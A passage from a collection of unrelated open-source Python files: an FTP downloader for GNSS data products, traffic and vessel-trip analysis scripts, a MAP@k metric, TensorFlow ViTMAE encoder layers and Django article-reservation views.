os.makedirs(fpath) # 创建路径\n shutil.copyfile(srcfile, dstfile) # 复制文件\n # print(\"copy %s -> %s\" % (srcfile, dstfile))\n\n\nclass Config(object):\n def __init__(self, config_path):\n if not is_file_exist(config_path):\n exit()\n\n self.__config_path = config_path\n self._config = configparser.ConfigParser()\n self._config.read(self.__config_path)\n self.current_date = GPST0\n self.start_date = GPST0\n self.end_date = GPST0\n self.max_try_num = 20\n self.sleep_second = 7\n self.user = ''\n self.password = ''\n\n def read_config_part(self, product):\n self.product = product\n cfg = self._config[product]\n if product == 'ctrl':\n pass\n return True\n self.flag = bool(int(cfg['download']))\n if self.flag is False:\n return False\n try:\n self.mode = cfg['mode']\n except:\n pass\n else:\n if self.mode == 'auto':\n self.delay = int(cfg['delay'])\n self.start_date = datetime.datetime.utcnow() - datetime.timedelta(days=self.delay)\n self.start_date = datetime.datetime(self.start_date.year, self.start_date.month, self.start_date.day, 0,\n 0, 0)\n self.end_date = self.start_date\n elif self.mode == 'hand':\n self.start_date = datetime.datetime.strptime(cfg['start_date'], '%Y%m%d')\n self.end_date = datetime.datetime.strptime(cfg['end_date'], '%Y%m%d')\n self.ftp = cfg['ftp']\n try:\n self.user = cfg['user']\n self.password = cfg['password']\n except:\n pass\n self.dest = cfg['dir']\n return True\n\n\nclass Session(object):\n def __init__(self):\n self.path = None\n self.host = None\n\n def login_ftp(self, ftp, user, password):\n # parse ftp\n ftp_scheme = parse.urlparse(ftp)\n self.host = ftp_scheme.netloc\n self.path = ftp_scheme.path\n\n # ftp session\n self.session = FTP(self.host, timeout=120)\n # self.session.set_debuglevel(1)\n # session.set_pasv(False)\n self.session.login(user, password)\n self.session.cwd(self.path)\n\n def quit_ftp(self):\n if self.session is None:\n return\n self.session.quit()\n\n\nclass DownloadFTP(object):\n def __init__(self, config_path):\n if config_path != '':\n self.configFTP = Config(config_path)\n self.sessionFTP = Session()\n\n def download(self):\n \"\"\"Download.\"\"\"\n for prodcut in self.configFTP._config.sections():\n if self.configFTP.read_config_part(prodcut):\n print('%s downloading......' % self.configFTP.product)\n self.sessionFTP.login_ftp(self.configFTP.ftp, self.configFTP.user, self.configFTP.password)\n self._download_product()\n self.sessionFTP.quit_ftp()\n print('complete\\n')\n\n def _download_product(self):\n self.configFTP.current_date = self.configFTP.start_date\n while self.configFTP.current_date <= self.configFTP.end_date:\n if self.configFTP.product in ['sp3', 'clk']:\n dest = os.path.join(self.configFTP.dest, '%d' % self.configFTP.current_date.year)\n if not os.path.isdir(dest):\n os.makedirs(dest)\n week, weekday = get_gps_weekday(self.configFTP.current_date)\n product_name = 'gbm%s%s.%s.Z' % (week, weekday, self.configFTP.product)\n source = ['%s/%d' % (self.sessionFTP.path, week)]\n self._download_file(self.sessionFTP.session, product_name, source, dest)\n elif self.configFTP.product in ['CODG', 'COPG']:\n dest = os.path.join(self.configFTP.dest, '%d' % self.configFTP.current_date.year)\n if not os.path.isdir(dest):\n os.makedirs(dest)\n product_name = '%s%03d0.%02dI.Z' % (\n self.configFTP.product, self.configFTP.current_date.timetuple().tm_yday,\n self.configFTP.current_date.year % 100)\n source = [('%s/%d' % (self.sessionFTP.path, self.configFTP.current_date.year)),\n ('%s' % self.sessionFTP.path)]\n self._download_file(self.sessionFTP.session, product_name, source, dest)\n elif self.configFTP.product in ['COD-DCB', 'CAS-DCB']:\n if not os.path.isdir(self.configFTP.dest):\n os.makedirs(self.configFTP.dest)\n source = ['%s/%d' % (self.sessionFTP.path, self.configFTP.current_date.year)]\n\n if self.configFTP.product == 'CAS-DCB':\n product_name = 'CAS0MGXRAP_%d%03d0000_01D_01D_DCB.BSX.gz' % (\n self.configFTP.current_date.year, self.configFTP.current_date.timetuple().tm_yday)\n self._download_file(self.sessionFTP.session, product_name, source, self.configFTP.dest)\n if not os.path.isfile(os.path.join(self.configFTP.dest, product_name).replace('.gz', '')):\n self.configFTP.current_date += datetime.timedelta(days=1)\n continue\n extractDCBFromSNX.extractDCBFromSNX(\n os.path.join(self.configFTP.dest, product_name).replace('.gz', ''),\n self.configFTP.dest, True)\n for i in ['C1', 'P2', 'P3']:\n old_file = os.path.join(self.configFTP.dest, 'P1%s%02d%02d%02d.DCB' % (\n i, self.configFTP.current_date.year % 100, self.configFTP.current_date.month,\n self.configFTP.current_date.day))\n new_file = os.path.join(os.path.split(self.configFTP.dest)[0],\n 'P1%s%02d%02d.DCB' % (i, self.configFTP.current_date.year % 100,\n self.configFTP.current_date.month))\n copy_file(old_file, new_file)\n elif self.configFTP.product == 'COD-DCB':\n for i in ['C1', 'P2']:\n product_name = 'P1%s%02d%02d.DCB.Z' % (\n i, self.configFTP.current_date.year % 100, self.configFTP.current_date.month)\n self._download_file(self.sessionFTP.session, product_name, source, self.configFTP.dest, )\n elif self.configFTP.product in ['brdm']:\n dest = os.path.join(self.configFTP.dest, '%d' % self.configFTP.current_date.year)\n if not os.path.isdir(dest):\n os.makedirs(dest)\n source = ['%s/%d/brdm' % (self.sessionFTP.path, self.configFTP.current_date.year)]\n product_name = '%s%03d0.%02dp.Z' % (\n self.configFTP.product, self.configFTP.current_date.timetuple().tm_yday,\n self.configFTP.current_date.year % 100)\n self._download_file(self.sessionFTP.session, product_name, source, dest)\n elif self.configFTP.product in ['sit_all']:\n dest = self.configFTP.dest\n if not os.path.isdir(dest):\n os.makedirs(dest)\n source = [self.sessionFTP.path]\n product_name = 'sit_all.xyz'\n self._download_file(self.sessionFTP.session, product_name, source, dest,is_uncompress=False,is_delete=False)\n product_name = 'sit_all.inf'\n self._download_file(self.sessionFTP.session, product_name, source, dest, is_uncompress=False,is_delete=False)\n self.configFTP.current_date += datetime.timedelta(days=1)\n\n def _download_file(self, session, product_name, source, dest, is_uncompress=True, is_delete=True):\n \"\"\"Download file.\"\"\"\n print(' try to download %s' % product_name)\n for i in source:\n try:\n self.sessionFTP.session.cwd(i)\n if product_name not in session.nlst():\n raise BaseException\n break\n except:\n continue\n else:\n print(' %s do not exist' % product_name)\n return\n file_path = os.path.join(dest, product_name)\n try_num = self.configFTP.max_try_num\n while try_num > 0:\n try:\n session.retrbinary('RETR %s' % product_name, open(file_path, 'wb').write)\n except:\n try_num -= 1\n print(' slpeep %ds and try again(NO.%d)' % (\n self.configFTP.sleep_second, self.configFTP.max_try_num - try_num))\n time.sleep(self.configFTP.sleep_second)\n else:\n if is_uncompress:\n uncompress(file_path, is_delete=is_delete)\n print(' success')\n break\n else:\n print(' fail')\n\n\nif __name__ == '__main__':\n config_path = os.path.join(os.path.dirname(__file__), 'configure.ini')\n downloader = DownloadFTP(config_path)\n downloader.download()\n","repo_name":"Jin-Whu/Download","sub_path":"download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":10873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14733782142","text":"import numpy as np\nimport pandas as pd\n\n\n# Loading Data\ns = set()\ns.add('occupancy_6005')\ns.add('occupancy_t4013')\ns.add('speed_6005')\ns.add('speed_7578')\ns.add('speed_t4013')\ns.add('TravelTime_387')\ns.add('TravelTime_451')\n\nfor x in s:\n exec(x + \" = pd.read_csv(filepath_or_buffer='Data/Traffic/\" + x + \".csv', parse_dates=True, index_col='timestamp')\")\n exec(x + \" = \" + x + \".rename(columns={'value': x})\")\n exec(x + \" = \" + x + \".resample('H').mean()\")\n","repo_name":"CarlosLing/Algoritms","sub_path":"Traffic/Main_EDTW.py","file_name":"Main_EDTW.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8917792403","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 19 16:27:19 2022\n\n@author: UT\n\"\"\"\n\n# 3rd party\nimport numpy as np\n\n# package\nfrom pymls import Lattice, Dislocation, Stroh, MLS\nfrom pymls.elastic import cij_from_group\nfrom pymls.toolbox import abt\n\n\n# - 1. crystal lattice\nscalar = (1, 1, 1, 60, 90, 120)\n\n# - 2. slip system\nhkl = np.array((0,0,1)) # BCC slip plane\nuvw = np.array((1,0,0)) # burgers vector\nl = np.array((0,1,0)) # dislocation line vector\nphi = abt(uvw, l, degrees=True) # 90 degrees == edge dislocation\n\n# - 3. elastic constituents\nC = cij_from_group(116.3, 64.8, 30.9, group='m-3m') # GPa\n\n# - 4. class instances\nL = Lattice.from_scalar( scalar ) \nD = Dislocation(lattice=L, hkl=hkl, uvw=uvw, phi=phi, SGno=None)\nS = Stroh(C) # captures characteristic elastic matrix and eigensolution\nI = MLS(dislocation=D, cij=C) # captures sum computation\n\n# - 5. viz\nfig, ax = D.visualize()\n\n\n\n\n# - \ndef MLS_M(lattice):\n \"\"\" eqn. 1 \"\"\"\n D = lattice\n R = lattice.reciprocal\n cos = np.cos(D.angles * np.pi/180)\n sin = np.sin(D.angles * np.pi/180)\n cosstar = np.cos(R.angles * np.pi/180)\n M = np.array((\n (1/D.a , 0 , 0 ),\n (-cos[2] / (D.a*sin[2]), 1 / (D.b * sin[2]), 0 ),\n (R.a * cosstar[1] , R.b * cosstar[0] , R.c)\n ))\n return M\n \n\n\ndef vol_from_scalar(a,b,c,al,be,ga):\n cosa = np.cos(al*np.pi/180)\n cosb = np.cos(be*np.pi/180)\n cosg = np.cos(ga*np.pi/180)\n return a*b*c*np.sqrt(1 + 2*cosa*cosb*cosg - cosa**2 - cosb**2 - cosg**2)\n\n\n# =============================================================================\n# \n# M = MLS_M(L)\n# L = Lattice(M)\n# D = Dislocation(lattice=L, hkl=hkl, uvw=uvw, phi=phi)\n# C2 = MLS(D, C)\n# \n# =============================================================================\n","repo_name":"PetMetz/pymls","sub_path":"examples/nonorthogonal_nonphysical.py","file_name":"nonorthogonal_nonphysical.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44570040822","text":"from dataclasses import dataclass\nfrom typing import List\n\nfrom sample.data_processing.data_classes import VesselTrip\nfrom sample.general.interval_manipulation import merge_intervals, total_interval_time, find_overlap, Interval\n\n\ndef get_direction(path):\n \"\"\" Get the direction of a path that goes to Fork-narrow. \"\"\"\n for i, (loc, dur) in enumerate(path):\n if loc == \"Fork_narrow\":\n if i > 0:\n prev_loc = path[i - 1][0]\n if \"AK4\" == prev_loc:\n return \"canal\"\n elif \"AK5\" == prev_loc:\n return \"harbor\"\n elif i < len(path) - 1:\n next_loc = path[i + 1][0]\n if \"AK4\" == next_loc:\n return \"harbor\"\n elif \"AK5\" == next_loc:\n return \"canal\"\n return \"no\"\n\n\ndef get_time_at_location(vt: VesselTrip, loc_name: str) -> Interval:\n \"\"\" Return the start and end timestamp (POSIX) when this trip in the indicated location. \"\"\"\n cum_dur = 0\n valid = False\n fork_dur = 0\n for loc, dur in vt.get_path():\n if loc == loc_name:\n valid = True\n fork_dur = dur\n break\n cum_dur += dur\n\n if not valid:\n return 0, 0\n\n start_time = vt.trip[0].time.timestamp()\n fork_start = start_time + cum_dur\n fork_end = start_time + cum_dur + fork_dur\n\n return fork_start, fork_end\n\n\n@dataclass\nclass ForkOverlap:\n vessel_first: VesselTrip\n vessel_second: VesselTrip\n overlap_duration: float\n overlap_start: float\n same_direction: bool\n\n\ndef get_throughput_fork(vts: List[VesselTrip]):\n \"\"\" Calculate the throughput in several areas by evaluating the time there is at least one ship present. \"\"\"\n vts = [vt for vt in vts if\n 7 <= vt.trip[0].time.hour and vt.trip[-1].time.hour <= 17 and vt.trip[0].time.dayofweek < 5]\n vts = sorted(vts, key=lambda t: t.trip[0].time)\n\n vesseltrips_to_canal = []\n vesseltrips_to_harbor = []\n for vt in vts:\n path = vt.get_path()\n if get_direction(path) == \"canal\":\n vesseltrips_to_canal.append(vt)\n elif get_direction(path) == \"harbor\":\n vesseltrips_to_harbor.append(vt)\n\n fork_to_canal = merge_intervals([get_time_at_location(vt, \"Fork_narrow\") for vt in vesseltrips_to_canal])\n fork_to_harbor = merge_intervals([get_time_at_location(vt, \"Fork_narrow\") for vt in vesseltrips_to_harbor])\n\n ak5_times = merge_intervals([get_time_at_location(vt, \"AK5\") for vt in vesseltrips_to_canal])\n intersection_times = merge_intervals([get_time_at_location(vt, \"Intersection\") for vt in vesseltrips_to_canal])\n\n total_time = 3600 * 10 * len({vt.trip[0].time.dayofyear for vt in vts})\n\n print(len(vesseltrips_to_harbor), len(vesseltrips_to_canal), len(fork_to_canal), len(fork_to_harbor))\n print(len(find_overlap(fork_to_canal, fork_to_harbor)))\n\n vals = [total_interval_time(fork_to_canal),\n total_interval_time(fork_to_harbor),\n total_interval_time(find_overlap(fork_to_canal, fork_to_harbor)),\n total_interval_time(merge_intervals(fork_to_canal + fork_to_harbor)),\n total_interval_time(ak5_times),\n total_interval_time(intersection_times)]\n descriptions = [\"Vork - richting kanaal\", \"Vork - richting Haven\", \"Vork kruisende schepen\", \"Vork totaal\",\n \"AK5\", \"Kruispunt\"]\n print(vals)\n print(total_time)\n for v, d in zip(vals, descriptions):\n print(f\"{d:25s} & {v:9d} & {100 * v / total_time:6.1f}\\\\% \\\\\\\\\")\n","repo_name":"UGent-DNA/WaterwaySimulation","sub_path":"sample/analysis/capacity_analysis.py","file_name":"capacity_analysis.py","file_ext":"py","file_size_in_byte":3578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36970223229","text":"from ..metric import Metric\n\nimport numpy as np\n\nclass MAP(Metric):\n # reference: https://github.com/benhamner/Metrics/blob/master/Python/ml_metrics/average_precision.py\n def init(self, k : int, relevance_threshold=0):\n super().init(k, relevance_threshold)\n\n def name(self):\n return f'MAP@{self.k}'\n \n def eval(self, ratings, recommendations):\n relevant_items = self._get_relevant_ratings(ratings)\n users_apk = [self._apk(set(rel_items), recommendations[u]) for u, rel_items in relevant_items.items()]\n return np.mean(users_apk)\n \n def _apk(self, rel_items, recommendations):\n if len(recommendations) > self.k:\n recommendations = recommendations[:self.k]\n \n score = 0.0\n num_hits = 0.0\n\n if not rel_items:\n return score\n\n for i, rec in enumerate(recommendations):\n if rec in rel_items and rec not in recommendations[:i]:\n num_hits += 1.0\n score += num_hits/(i+1.0)\n\n return score/min(len(rel_items), self.k)","repo_name":"AlvaroJoseLopes/Knowledge-Graph-aware-Recommender-Systems-with-DBpedia","sub_path":"framework/evaluator/metrics/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"32260864505","text":"import math\nfrom typing import Optional, Tuple, Union\n\nimport numpy as np\nimport tensorflow as tf\nfrom transformers.activations_tf import get_tf_activation\nfrom transformers.file_utils import ModelOutput\nfrom transformers.modeling_tf_outputs import TFBaseModelOutput\nfrom transformers.modeling_tf_utils import TFModelInputType, get_initializer\nfrom transformers.tf_utils import shape_list, stable_softmax\n\nfrom .embeddings import ViTMAEEmbeddings\n\n###############################################################################\n# Model Output Data Class\n###############################################################################\n\n\nclass TFViTMAEModelOutput(ModelOutput):\n \"\"\"\n Class for TFViTMAEModel's outputs, with potential hidden states and attentions.\n Args:\n cls_token_output (`tf.Tensor` of shape `(batch_size, hidden_size)`):\n This is the output from the CLS Token.\n last_hidden_state (`tf.Tensor` of shape `(batch_size, sequence_length, hidden_size)`):\n Sequence of hidden-states at the output of the last layer of the model.\n mask (`tf.Tensor` of shape `(batch_size, sequence_length)`):\n Tensor indicating which patches are masked (1) and which are not (0).\n ids_restore (`tf.Tensor` of shape `(batch_size, sequence_length)`):\n Tensor containing the original index of the (shuffled) masked patches.\n hidden_states (`tuple(tf.Tensor)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):\n Tuple of `tf.Tensor` (one for the output of the embeddings + one for the output of each layer) of shape\n `(batch_size, sequence_length, hidden_size)`. Hidden-states of the model at the output of each layer plus\n the initial embedding outputs.\n attentions (`tuple(tf.Tensor)`, *optional*, returned when `output_attentions=True` is passed or when `config.output_attentions=True`):\n Tuple of `tf.Tensor` (one for each layer) of shape `(batch_size, num_heads, sequence_length,\n sequence_length)`. Attentions weights after the attention softmax, used to compute the weighted average in\n the self-attention heads.\n \"\"\"\n\n cls_token_output: tf.Tensor = None\n last_hidden_state: tf.Tensor = None\n mask: tf.Tensor = None\n ids_restore: tf.Tensor = None\n hidden_states: Optional[Tuple[tf.Tensor]] = None\n attentions: Optional[Tuple[tf.Tensor]] = None\n\n\n###############################################################################\n# Self Attention and Attention\n###############################################################################\n\n\nclass TFViTMAESelfAttention(tf.keras.layers.Layer):\n \"\"\"The multi head self attention module.\"\"\"\n\n def __init__(self, config, **kwargs):\n super().__init__(**kwargs)\n\n # The hidden size must be divisible by the number of heads to facilitate\n # multi-heads attention.\n if config.hidden_size % config.num_attention_heads != 0:\n raise ValueError(\n f\"The hidden size ({config.hidden_size}) is not a multiple of the number \"\n f\"of attention heads ({config.num_attention_heads})\"\n )\n\n self.num_attention_heads = config.num_attention_heads\n self.attention_head_size = int(config.hidden_size / config.num_attention_heads)\n self.all_head_size = self.num_attention_heads * self.attention_head_size\n self.sqrt_att_head_size = math.sqrt(self.attention_head_size)\n\n self.query = tf.keras.layers.Dense(\n units=self.all_head_size,\n kernel_initializer=get_initializer(config.initializer_range),\n name=\"query\",\n )\n self.key = tf.keras.layers.Dense(\n units=self.all_head_size,\n kernel_initializer=get_initializer(config.initializer_range),\n name=\"key\",\n )\n self.value = tf.keras.layers.Dense(\n units=self.all_head_size,\n kernel_initializer=get_initializer(config.initializer_range),\n name=\"value\",\n )\n self.dropout = tf.keras.layers.Dropout(rate=config.attention_probs_dropout_prob)\n\n def transpose_for_scores(self, tensor: tf.Tensor, batch_size: int) -> tf.Tensor:\n # Reshape from [batch_size, seq_length, all_head_size] to [batch_size, seq_length, num_attention_heads, attention_head_size]\n tensor = tf.reshape(\n tensor=tensor,\n shape=(batch_size, -1, self.num_attention_heads, self.attention_head_size),\n )\n\n # Transpose the tensor from [batch_size, seq_length, num_attention_heads, attention_head_size] to\n # [batch_size, num_attention_heads, seq_length, attention_head_size]\n return tf.transpose(tensor, perm=[0, 2, 1, 3])\n\n def call(\n self,\n hidden_states: tf.Tensor,\n head_mask: tf.Tensor,\n output_attentions: bool,\n training: bool = False,\n ) -> Tuple[tf.Tensor]:\n batch_size = shape_list(hidden_states)[0]\n\n mixed_query_layer = self.query(inputs=hidden_states)\n mixed_key_layer = self.key(inputs=hidden_states)\n mixed_value_layer = self.value(inputs=hidden_states)\n\n query_layer = self.transpose_for_scores(mixed_query_layer, batch_size)\n key_layer = self.transpose_for_scores(mixed_key_layer, batch_size)\n value_layer = self.transpose_for_scores(mixed_value_layer, batch_size)\n\n # Take the dot product between \"query\" and \"key\" to get the raw attention scores.\n attention_scores = tf.matmul(query_layer, key_layer, transpose_b=True)\n dk = tf.cast(self.sqrt_att_head_size, dtype=attention_scores.dtype)\n attention_scores = tf.divide(attention_scores, dk)\n\n # Normalize the attention scores to probabilities.\n attention_probs = stable_softmax(logits=attention_scores, axis=-1)\n\n # This is actually dropping out entire tokens to attend to, which might\n # seem a bit unusual, but is taken from the original Transformer paper.\n attention_probs = self.dropout(inputs=attention_probs, training=training)\n\n # Mask heads if we want to\n if head_mask is not None:\n attention_probs = tf.multiply(attention_probs, head_mask)\n\n attention_output = tf.matmul(attention_probs, value_layer)\n attention_output = tf.transpose(attention_output, perm=[0, 2, 1, 3])\n\n # (batch_size, seq_len_q, all_head_size)\n attention_output = tf.reshape(\n tensor=attention_output, shape=(batch_size, -1, self.all_head_size)\n )\n outputs = (\n (attention_output, attention_probs)\n if output_attentions\n else (attention_output,)\n )\n\n return outputs\n\n\nclass TFViTMAESelfOutput(tf.keras.layers.Layer):\n \"\"\"\n The residual connection is defined in TFViTMAELayer instead of here\n (as is the case with other models), due to the layernorm applied\n before each block.\n \"\"\"\n\n def __init__(self, config, **kwargs):\n super().__init__(**kwargs)\n\n self.dense = tf.keras.layers.Dense(\n units=config.hidden_size,\n kernel_initializer=get_initializer(config.initializer_range),\n name=\"dense\",\n )\n self.dropout = tf.keras.layers.Dropout(rate=config.hidden_dropout_prob)\n\n def call(self, hidden_states: tf.Tensor, training: bool = False) -> tf.Tensor:\n hidden_states = self.dense(inputs=hidden_states)\n hidden_states = self.dropout(inputs=hidden_states, training=training)\n\n return hidden_states\n\n\nclass TFViTMAEAttention(tf.keras.layers.Layer):\n def __init__(self, config, **kwargs):\n super().__init__(**kwargs)\n\n self.self_attention = TFViTMAESelfAttention(config, name=\"attention\")\n self.dense_output = TFViTMAESelfOutput(config, name=\"output\")\n\n def call(\n self,\n input_tensor: tf.Tensor,\n head_mask: tf.Tensor,\n output_attentions: bool,\n training: bool = False,\n ) -> Tuple[tf.Tensor]:\n self_outputs = self.self_attention(\n hidden_states=input_tensor,\n head_mask=head_mask,\n output_attentions=output_attentions,\n training=training,\n )\n attention_output = self.dense_output(\n hidden_states=self_outputs[0], training=training\n )\n outputs = (attention_output,) + self_outputs[1:]\n\n return outputs\n\n\n###############################################################################\n# Intermediate Layers\n###############################################################################\n\n\nclass TFViTMAEIntermediate(tf.keras.layers.Layer):\n def __init__(self, config, **kwargs):\n super().__init__(**kwargs)\n\n self.dense = tf.keras.layers.Dense(\n units=config.intermediate_size,\n kernel_initializer=get_initializer(config.initializer_range),\n name=\"dense\",\n )\n\n if isinstance(config.hidden_act, str):\n self.intermediate_act_fn = get_tf_activation(config.hidden_act)\n else:\n self.intermediate_act_fn = config.hidden_act\n\n def call(self, hidden_states: tf.Tensor) -> tf.Tensor:\n hidden_states = self.dense(inputs=hidden_states)\n hidden_states = self.intermediate_act_fn(hidden_states)\n\n return hidden_states\n\n\nclass TFViTMAEOutput(tf.keras.layers.Layer):\n def __init__(self, config, **kwargs):\n super().__init__(**kwargs)\n\n self.dense = tf.keras.layers.Dense(\n units=config.hidden_size,\n kernel_initializer=get_initializer(config.initializer_range),\n name=\"dense\",\n )\n self.dropout = tf.keras.layers.Dropout(rate=config.hidden_dropout_prob)\n\n def call(\n self, hidden_states: tf.Tensor, input_tensor: tf.Tensor, training: bool = False\n ) -> tf.Tensor:\n hidden_states = self.dense(inputs=hidden_states)\n hidden_states = self.dropout(inputs=hidden_states, training=training)\n hidden_states = hidden_states + input_tensor\n\n return hidden_states\n\n\n###############################################################################\n# MAE Layer\n###############################################################################\n\n\nclass TFViTMAELayer(tf.keras.layers.Layer):\n \"\"\"This corresponds to the Block class in the timm implementation.\"\"\"\n\n def __init__(self, config, **kwargs):\n super().__init__(**kwargs)\n\n self.attention = TFViTMAEAttention(config, name=\"attention\")\n self.intermediate = TFViTMAEIntermediate(config, name=\"intermediate\")\n self.vit_output = TFViTMAEOutput(config, name=\"output\")\n\n self.layernorm_before = tf.keras.layers.LayerNormalization(\n epsilon=config.layer_norm_eps, name=\"layernorm_before\"\n )\n self.layernorm_after = tf.keras.layers.LayerNormalization(\n epsilon=config.layer_norm_eps, name=\"layernorm_after\"\n )\n\n def call(\n self,\n hidden_states: tf.Tensor,\n head_mask: tf.Tensor,\n output_attentions: bool,\n training: bool = False,\n ) -> Tuple[tf.Tensor]:\n attention_outputs = self.attention(\n # in ViTMAE, layernorm is applied before self-attention\n input_tensor=self.layernorm_before(inputs=hidden_states),\n head_mask=head_mask,\n output_attentions=output_attentions,\n training=training,\n )\n attention_output = attention_outputs[0]\n\n # first residual connection\n hidden_states = attention_output + hidden_states\n\n # in ViTMAE, layernorm is also applied after self-attention\n layer_output = self.layernorm_after(inputs=hidden_states)\n\n intermediate_output = self.intermediate(hidden_states=layer_output)\n\n # second residual connection is done here\n layer_output = self.vit_output(\n hidden_states=intermediate_output,\n input_tensor=hidden_states,\n training=training,\n )\n outputs = (layer_output,) + attention_outputs[\n 1:\n ] # add attentions if we output them\n\n return outputs\n\n\n###############################################################################\n# Encoder Layer\n###############################################################################\n\n\nclass TFViTMAEEncoder(tf.keras.layers.Layer):\n def __init__(self, config, **kwargs):\n super().__init__(**kwargs)\n\n self.layer = [\n TFViTMAELayer(config, name=f\"layer_._{i}\")\n for i in range(config.num_hidden_layers)\n ]\n\n def call(\n self,\n hidden_states: tf.Tensor,\n head_mask: tf.Tensor,\n output_attentions: bool,\n output_hidden_states: bool,\n return_dict: bool,\n training: bool = False,\n ) -> Union[TFBaseModelOutput, Tuple[tf.Tensor]]:\n all_hidden_states = () if output_hidden_states else None\n all_attentions = () if output_attentions else None\n\n for i, layer_module in enumerate(self.layer):\n if output_hidden_states:\n all_hidden_states = all_hidden_states + (hidden_states,)\n\n layer_outputs = layer_module(\n hidden_states=hidden_states,\n head_mask=head_mask[i],\n output_attentions=output_attentions,\n training=training,\n )\n hidden_states = layer_outputs[0]\n\n if output_attentions:\n all_attentions = all_attentions + (layer_outputs[1],)\n\n # Add last layer\n if output_hidden_states:\n all_hidden_states = all_hidden_states + (hidden_states,)\n\n if not return_dict:\n return tuple(\n v\n for v in [hidden_states, all_hidden_states, all_attentions]\n if v is not None\n )\n\n return TFBaseModelOutput(\n last_hidden_state=hidden_states,\n hidden_states=all_hidden_states,\n attentions=all_attentions,\n )\n","repo_name":"ayulockin/TF-MSN","sub_path":"msn/model/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":14097,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"13600910245","text":"import traceback\nimport logging\n\nfrom django.http import HttpRequest\nfrom django.http import HttpResponse\nfrom django.shortcuts import redirect\nfrom frontpage.models import Article, ArticleGroup, GroupReservation, Profile\nfrom frontpage.management.page_skeleton import render_headbar, render_footer\nfrom frontpage.management.form import Form, NumberField, TextArea, SubmitButton, PlainText\nfrom frontpage.management.magic import get_article_pcs_free\nfrom frontpage.uitools.body import get_type_string, render_price\nfrom ..magic import get_current_user\nfrom ..grouptools.edit_group import get_article_dict\n\n\nlogger = logging.getLogger(__file__)\n\n\ndef get_group_variations(grp: ArticleGroup):\n sizes = []\n types = []\n for article in Article.objects.all().filter(group=grp):\n if article.size not in sizes:\n sizes.append(article.size)\n if article.type not in types:\n types.append(article.type)\n sizesstr = \"\"\n typesstr = \"\"\n sizes.sort()\n types.sort()\n for s in sizes:\n sizesstr += \" \" + s\n for t in types:\n typesstr += \" \" + get_type_string(t)\n return sizesstr + \" \", typesstr + \" \"\n\ndef render_article_selection_page(request: HttpRequest):\n rid: str = str(request.GET.get(\"rid\"))\n known_groups = []\n page = 1\n if request.GET.get('page'):\n page = int(request.GET['page'])\n items_per_page = 50\n if request.GET.get('objects'):\n items_per_page = int(request.GET[\"objects\"])\n total_items = Article.objects.all().filter(visible=True).filter(underConstruction=False).count()\n max_page = total_items / items_per_page\n if max_page < 1:\n max_page = 1\n if page > max_page:\n page = max_page\n start_range = 1 + page * items_per_page\n if start_range > total_items:\n start_range = 0\n end_range = (page + 1) * items_per_page\n a = render_headbar(request, title=\"Select article\")\n a += '<div class=\"w3-row w3-padding-64 w3-twothird w3-container\">'\n a += '<h3>Please select your desired article</h3><table><tr><th>Select</th><th>Preview</th>' \\\n + '<th>Title</th><th>Size</th><th>Type</th></tr>'\n objects = Article.objects.filter(visible=True).filter(underConstruction=False).filter(pk__range=(start_range, end_range))\n for article in objects:\n group = article.group\n if group is None:\n s: str = None\n p = article.flashImage\n if p:\n s = p.lowResFile\n else:\n s = \"/staticfiles/frontpage/no-image.png\"\n a += '<tr><td><a href=\"/admin/reservations/article-detail-select?article_id=' + str(article.pk)\n if request.GET.get(\"srid\"):\n a += '&srid=' + str(request.GET[\"srid\"])\n a += '&rid=' + rid + '\"><img src=\"/staticfiles/frontpage/order-article.png\" class=\"button-img\"/>' + \\\n '</a></td><td><img src=\"'\n a += s + '\" /></td><td>' + article.description + '</td><td>' + article.size + '</td><td>' + \\\n get_type_string(article.type) + '</td></tr>'\n elif group not in known_groups:\n known_groups.append(group)\n s: str = None\n p = group.group_flash_image\n if p:\n s = p.lowResFile\n else:\n s = \"/staticfiles/frontpage/no-image.png\"\n sizes, types = get_group_variations(group)\n a += '<tr><td><a href=\"/admin/reservations/article-detail-select?article_id=' + str(article.pk)\n if request.GET.get(\"srid\"):\n a += '&srid=' + str(request.GET[\"srid\"])\n a += '&rid=' + rid + '\"><img src=\"/staticfiles/frontpage/order-article.png\" ' + \\\n 'class=\"button-img\"/></a></td><td><img src=\"'\n a += s + '\" /></td><td>' + group.group_name + '</td><td>' + sizes + '</td><td>' + \\\n types + '</td></tr>'\n a += '</table>'\n if page > 1:\n a += '<a href=\"' + request.path + '?page=' + str(page - 1) + '&objects=' + str(objects) + \\\n '\" class=\"button\">Previous page </a>'\n if page < max_page:\n a += '<a href=\"' + request.path + '?page=' + str(page + 1) + '&objects=' + str(objects) + \\\n '\" class=\"button\">Next page </a>'\n a += '</div>' + render_footer(request)\n return HttpResponse(a)\n\n\ndef render_detail_selection(request: HttpRequest):\n try:\n res: GroupReservation = -1\n user: Profile = None\n try:\n res = GroupReservation.objects.get(id=int(request.GET[\"rid\"]))\n user = get_current_user(request)\n if res.createdByUser != user and user.rights < 2:\n raise Exception(\"Editing foreign reservation\")\n except Exception as e:\n logger.warning(\"\\nUser \" + str(user) + \" from IP \" + str(request.META['REMOTE_ADDR']) + \\\n \" Caused an exception: \" + traceback.format_exc() + \"\\n\\n\")\n return redirect(\"/admin/?msgid=editreservation.invalidrequest;\" + str(e))\n a: Article = Article.objects.get(pk=int(request.GET[\"article_id\"]))\n if \"rid\" not in request.GET:\n raise Exception(\"No reservation provided\")\n f: Form = Form()\n if a.group is None:\n f.action_url = \"/admin/actions/add-article-to-reservation?rid=\" + str(int(request.GET[\"rid\"])) + \\\n \"&article_id=\" + 